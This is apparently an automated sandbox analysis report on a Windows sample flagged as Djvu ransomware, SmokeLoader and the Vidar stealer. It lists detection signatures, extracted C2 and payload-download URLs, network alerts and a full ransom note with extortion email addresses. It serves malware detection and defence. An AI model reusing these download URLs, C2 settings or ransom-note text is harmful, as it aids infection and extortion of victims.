Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1447536
MD5: a25ac46e5bea920465d1838177782e5b
SHA1: 7abf711cac6ff5f35fc0b3f435d6ec5d9b0a0298
SHA256: 4f367a58544f96f8d0dd19d323acf0db1437d2cd8ef96324a37ea7be20cabf36
Tags: exe
Infos:

Detection

Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Clipboard Hijacker
Yara detected Djvu Ransomware
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies existing user documents (likely ransomware behavior)
Opens network shares
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes a notice file (html or txt) to demand a ransom
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Babuk Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
Name Description Attribution Blogpost URLs Link
STOP, Djvu STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stop
Name Description Attribution Blogpost URLs Link
SmokeLoader The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: file.exe Avira: detected
Source: https://api.2ip.ua/geo.json. Avira URL Cloud: Label: malware
Source: http://cajgtus.com/files/1/build3.exe? Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsonJ Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.rddpg
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.rddpg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "4b617f18efba315ca20e874e36c04827", "Version": "9.8"}
Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: sdfjhuz.com Virustotal: Detection: 22% Perma Link
Source: cajgtus.com Virustotal: Detection: 23% Perma Link
Source: transfer.adttemp.com.br Virustotal: Detection: 8% Perma Link
Source: nessotechbd.com Virustotal: Detection: 18% Perma Link
Source: trad-einmyus.com Virustotal: Detection: 16% Perma Link
Source: api.2ip.ua Virustotal: Detection: 6% Perma Link
Source: https://65.109.242.59/d Virustotal: Detection: 6% Perma Link
Source: https://65.109.242.59/r Virustotal: Detection: 6% Perma Link
Source: https://65.109.242.59/tography Virustotal: Detection: 6% Perma Link
Source: https://65.109.242.59/. Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\rujtcgu ReversingLabs: Detection: 31%
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe Virustotal: Detection: 43% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00411178 CryptDestroyHash,CryptReleaseContext, 10_2_00411178
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 10_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 10_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 10_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 10_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 10_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 15_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext, 15_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext, 15_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00411178 CryptDestroyHash,CryptReleaseContext, 15_2_00411178
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040EA51 CryptDestroyHash,CryptReleaseContext, 15_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040EC68 CryptDestroyHash,CryptReleaseContext, 15_2_0040EC68
Source: E609.exe, 0000000F.00000002.2883282984.000000000310E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_b49521e8-f

Compliance

barindex
Source: C:\Users\user\AppData\Local\Temp\E609.exe Unpacked PE file: 10.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E609.exe Unpacked PE file: 15.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 17.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Unpacked PE file: 19.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 27.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Unpacked PE file: 28.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 33.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 35.2.mstsca.exe.400000.0.unpack
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\_readme.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\$WinREAgent\_readme.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\$WinREAgent\Scratch\_readme.txt Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe File created: C:\Users\user\_readme.txt
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 10_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose, 15_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose, 15_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 15_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose, 15_2_0040FB98
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

barindex
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49742 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49750 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49752 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49753 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49754 -> 189.163.126.89:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49754 -> 189.163.126.89:80
Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49757 -> 213.172.74.157:80
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49759 -> 158.160.165.129:80
Source: Traffic Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49760 -> 213.172.74.157:80
Source: Traffic Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49760 -> 213.172.74.157:80
